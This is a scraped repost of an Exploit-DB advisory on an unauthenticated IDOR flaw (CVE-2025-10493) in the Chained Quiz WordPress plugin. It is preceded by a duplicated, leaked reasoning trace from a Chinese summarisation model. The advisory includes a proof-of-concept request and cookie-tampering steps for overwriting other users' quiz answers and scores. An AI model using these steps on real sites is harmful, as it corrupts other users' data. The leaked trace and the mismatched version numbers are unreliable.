[webapps] Chained Quiz 1.3.5 - Unauthenticated Insecure Direct Object Reference via Cookie
好的,我现在需要帮用户总结这篇文章的内容,控制在100个字以内。首先,我得仔细阅读文章,理解其中的主要信息。 文章标题是“Chained Quiz 1.3.5 - 未认证的不安全直接对象引用通过Cookie”,看起来这是一个安全漏洞。作者是Karuppiah Sabari Kumar,日期是2025年12月19日。漏洞类型是不安全的直接对象引用和授权不当。 描述部分提到,Chained Quiz插件使用可预测的自增数据库ID(completion_id)存储每个测验尝试,并将这个值暴露在客户端Cookie中。当用户提交或重新提交测验答案时,服务器仅基于这个Cookie值更新记录,而没有验证是否属于当前认证用户。因此,攻击者可以通过猜测或枚举有效的completion_id来劫持或篡改其他用户的测验尝试。 影响方面,攻击者可以任意修改其他用户的测验答案、分数或结果,导致数据完整性问题,并可能影响评估、排行榜或证书颁发。 接下来,我需要将这些信息浓缩到100字以内。重点包括:漏洞名称、影响范围、利用方式、后果等。 可能的结构:Chained Quiz插件存在未认证的IDOR漏洞,通过Cookie中的completion_id暴露ID。攻击者可篡改其他用户测验结果,导致数据完整性问题。 检查字数是否在限制内,并确保信息准确无误。 </think> Chained Quiz插件存在未认证的不安全直接对象引用漏洞。攻击者可通过预测或枚举cookie中的completion_id值篡改其他用户的测验答案和分数,导致数据完整性受损。 2025-12-25 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:0 收藏
好的,我现在需要帮用户总结这篇文章的内容,控制在100个字以内。首先,我得仔细阅读文章,理解其中的主要信息。 文章标题是“Chained Quiz 1.3.5 - 未认证的不安全直接对象引用通过Cookie”,看起来这是一个安全漏洞。作者是Karuppiah Sabari Kumar,日期是2025年12月19日。漏洞类型是不安全的直接对象引用和授权不当。 描述部分提到,Chained Quiz插件使用可预测的自增数据库ID(completion_id)存储每个测验尝试,并将这个值暴露在客户端Cookie中。当用户提交或重新提交测验答案时,服务器仅基于这个Cookie值更新记录,而没有验证是否属于当前认证用户。因此,攻击者可以通过猜测或枚举有效的completion_id来劫持或篡改其他用户的测验尝试。 影响方面,攻击者可以任意修改其他用户的测验答案、分数或结果,导致数据完整性问题,并可能影响评估、排行榜或证书颁发。 接下来,我需要将这些信息浓缩到100字以内。重点包括:漏洞名称、影响范围、利用方式、后果等。 可能的结构:Chained Quiz插件存在未认证的IDOR漏洞,通过Cookie中的completion_id暴露ID。攻击者可篡改其他用户测验结果,导致数据完整性问题。 检查字数是否在限制内,并确保信息准确无误。 </think> Chained Quiz插件存在未认证的不安全直接对象引用漏洞。攻击者可通过预测或枚举cookie中的completion_id值篡改其他用户的测验答案和分数,导致数据完整性受损。 2025-12-25 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:0 收藏
# Exploit Title: Chained Quiz 1.3.5 - Unauthenticated Insecure Direct Object Reference via Cookie
# Date: 19-12-2025
# Exploit Author: Karuppiah Sabari Kumar(0xsabre)
# Vendor Homepage: https://wordpress.org/plugins/chained-quiz/
# Software Link: https://downloads.wordpress.org/plugin/chained-quiz.1.3.3.zip
# Version: <= 1.3.3
# Tested on: WordPress / Linux
# CVE: CVE-2025-10493
------------------------------------------------------------
## Vulnerability Type
Insecure Direct Object Reference (IDOR) / Improper Authorization
------------------------------------------------------------
## Description
The Chained Quiz plugin stores each quiz attempt using a predictable,
auto-incrementing database ID (completion_id) and exposes this value
directly in a client-side cookie named:
chained_completion_id<quiz_id>
When submitting or re-submitting quiz answers via admin-ajax.php, the
server updates the quiz attempt record based solely on this cookie value,
without verifying that the attempt belongs to the currently authenticated
user.
No authentication is required to exploit this vulnerability when the
plugin is used with default settings.
The server retrieves the quiz attempt directly using the completion_id
from the cookie and performs an UPDATE query without verifying ownership.
As a result, an attacker can hijack or tamper with other users’ quiz
attempts by guessing or enumerating valid completion_id values and
replaying answer submissions.
------------------------------------------------------------
## Affected Component
Quiz submission and results handling functionality via admin-ajax.php
------------------------------------------------------------
## Proof of Concept (PoC)
### Step 1: Victim user submission
A user completes a quiz. The submission is stored using a completion ID
and associated with the user’s session via a cookie, for example:
chained_completion_id1=2
------------------------------------------------------------
### Step 2: Attacker interception
The attacker completes the same quiz and intercepts their own submission
request using a proxy or browser developer tools.
Example request:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Cookie: chained_completion_id1=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
answer=0&question_id=1&quiz_id=1&post_id=117&question_type=radio&points=0&action=chainedquiz_ajax&chainedquiz_action=answer&total_questions=1
------------------------------------------------------------
### Step 3: Tampering
The attacker modifies the cookie value to match another user’s quiz
attempt, for example:
chained_completion_id1=2
The attacker may also modify parameters such as "answer" or "points" to
manipulate quiz responses or scores.
The modified request is then sent to the server.
------------------------------------------------------------
### Step 4: Result
The server overwrites the victim user’s quiz submission, including answers
and points, without validating ownership of the completion ID.
------------------------------------------------------------
## Impact
An attacker can arbitrarily modify quiz answers, scores, or results
belonging to other users. This results in an integrity violation of quiz
data and allows unauthorized manipulation of finalized quiz attempts.
In environments where quiz results are used for assessments, leaderboards,
or certificates, this can undermine trust in the platform and affect any
downstream integrations that rely on quiz completion data.
------------------------------------------------------------
## CWE
- CWE-639: Authorization Bypass Through User-Controlled Key
- CWE-285: Improper Authorization
------------------------------------------------------------
文章来源: https://www.exploit-db.com/exploits/52464
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh